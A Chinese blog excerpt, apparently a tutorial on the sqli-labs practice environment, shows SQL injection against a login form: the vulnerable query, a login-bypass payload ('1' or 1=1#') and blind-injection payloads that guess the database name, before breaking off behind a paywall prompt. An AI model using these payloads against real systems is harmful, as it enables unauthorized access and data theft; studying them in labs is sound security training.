后台代码:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
输入账号:Dumb 密码:Dumb2
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb2' LIMIT 0,1
绕过登录:
输入账号:aaa 密码:1' or 1=1#
SELECT username, password FROM users WHERE username='aaa' and password='1' or 1=1#' LIMIT 0,1
Sql注入1:盲注
输入账号:Dumb 密码:Dumb' and length(database())=8#
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb' and length(database())=8#' LIMIT 0,1
security
输入账号:Dumb 密码:Dumb' and ascii(substr(database(),1,1))=115#
SELECT username, password FROM users WHERE&nb

这篇博客探讨了SQL注入攻击,通过示例展示了如何利用账号密码登录界面进行注入。作者提到了两种类型的SQL注入:盲注和报错注入,并给出具体的注入字符串示例,揭示了数据库安全的重要性。
最低0.47元/天 解锁文章
2610

被折叠的 条评论
为什么被折叠?



